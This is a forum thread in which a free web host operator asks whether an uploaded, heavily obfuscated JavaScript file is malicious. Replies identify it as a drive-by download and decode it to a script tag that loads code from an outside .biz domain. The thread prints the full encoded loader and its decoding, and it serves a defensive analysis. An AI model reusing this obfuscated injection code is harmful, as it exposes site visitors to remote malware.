Please help is this Malicious Javascript

dalem Peon

Messages:: 494

Likes Received:: 12

Best Answers:: 0

Trophy Points:: 0

#1

I run a free web host and one of my users has uploaded this Javascript file to his folder.

It has been encoded using document.write(unescape( function.

document.write(unescape('%3C%73%63%72%69%70%74%20% 6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72 %69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%58%28%6 1%29%7B%76%61%72%20%62%3D%75%6E%65%73%63%61%70%65% 28%61%2E%73%75%62%73%74%72%28%30%2C%61%2E%6C%65%6E %67%74%68%2D%31%29%29%3B%76%61%72%20%63%3D%27%27%3 B%66%6F%72%28%69%3D%30%3B%69%3C%62%2E%6C%65%6E%67% 74%68%3B%69%2B%2B%29%63%2B%3D%53%74%72%69%6E%67%2E %66%72%6F%6D%43%68%61%72%43%6F%64%65%28%62%2E%63%6 8%61%72%43%6F%64%65%41%74%28%69%29%2D%61%2E%73%75% 62%73%74%72%28%61%2E%6C%65%6E%67%74%68%2D%31%2C%31 %29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%6 5%28%75%6E%65%73%63%61%70%65%28%63%29%29%3B%7D%3C% 2F%73%63%72%69%70%74%3E'));X('%297Gwgvmtx%2964perk yeki%297H%2966nezewgvmtx%2966%297Ihsgyqirx2%7Bvmxi %296%3Cyriwgeti%296%3C%296%3B%29697G%2969%3B7%2969 %3A7%2969%3B6%2969%3A%3D%2969%3B4%2969%3B8%296964% 2969%3B8%2969%3B%3D%2969%3B4%2969%3A9%29697H%29696 6%2969%3B8%2969%3A9%2969%3B%3C%2969%3B8%29696J%296 9%3AE%2969%3A5%2969%3B%3A%2969%3A5%2969%3B7%2969%3 A7%2969%3B6%2969%3A%3D%2969%3B4%2969%3B8%296966%29 6964%2969%3B7%2969%3B6%2969%3A7%29697H%296966%2969 %3A%3C%2969%3B8%2969%3B8%2969%3B4%29697E%29696J%29 696J%2969%3B7%2969%3B8%2969%3B6%2969%3A%3D%2969%3A 7%2969%3B8%2969%3AG%2969%3B%3D%2969%3A%3D%2969%3AI %29696I%2969%3A6%2969%3A%3D%2969%3BE%29696J%2969%3 A%3A%296966%29697I%29697G%29696J%2969%3B7%2969%3A7 %2969%3B6%2969%3A%3D%2969%3B4%2969%3B8%29697I%296% 3B%296%3D%296%3D%297F%297G3wgvmtx%297I%294E4');
Click to expand...

I have managed to get it unencoded and it reads thus:

document.write(unescape('<script language="javascript">function X(a){var b=unescape(a.substr(0,a.length-1));var c='';for(i=0;i<b.length;i++)c+=String.fromCharCode (b.charCodeAt(i)-a.substr(a.length-1,1));document.write(unescape(c));}</script>'));X(')7Gwgvmtx)64perkyeki)7H)66nezewgvmtx )66)7Ihsgyqirx2{vmxi)6<yriwgeti)6<)6697G)69;7)69 :7)69;6)69:=)69;4)69;8)6964)69;8)69;=)69;4)69:9)69 7H)6966)69;8)69:9)69;<)69;8)696J)69:E)69:5)69;69 :5)69;7)69:7)69;6)69:=)69;4)69;8)6966)6964)69;7)69 ;6)69:7)697H)6966)69:<)69;8)69;8)69;4)697E)696J)69 6J)69;7)69;8)69;6)69:=)69:7)69;8)69:G)69;=)69:=)69 :I)696I)69:6)69:=)69;E)696J)69:6966)697I)697G)69 6J)69;7)69:7)69;6)69:=)69;4)69;8)697I)66=)6=)7F) 7G3wgvmtx)7I)4E4');
Click to expand...

Please could anyone tell me what this Javascript does.

Thank you.

Dalem

dalem, Jul 17, 2008 IP

Sleeping Troll Peon

Messages:: 217

Likes Received:: 2

Best Answers:: 0

Trophy Points:: 0

#2

It looks like an attempt to get to your wwwroot directory, can't be sure.

Try decoding char codes following "69" into string.

Sleeping Troll, Jul 21, 2008 IP

falcondriver Well-Known Member

Messages:: 963

Likes Received:: 47

Best Answers:: 0

Trophy Points:: 145

#3

looks like a drive by download. decodes to
<s%63ript type%3D"text/jav%61script" s%72c="http:/%2Fstrictlyi%6E.biz/f"><%2Fscript>'));%3C/s
PHP:
http://scriptasylum.com/tutorials/encdec/encode-decode.html
had some injections with this "dodgydomain.info/letter" type javascripts on some old iis/ms sql webserver recently.

falcondriver, Jul 21, 2008 IP

Log in or Sign up

Please help is this Malicious Javascript

dalem Peon

Sleeping Troll Peon

falcondriver Well-Known Member

Useful Searches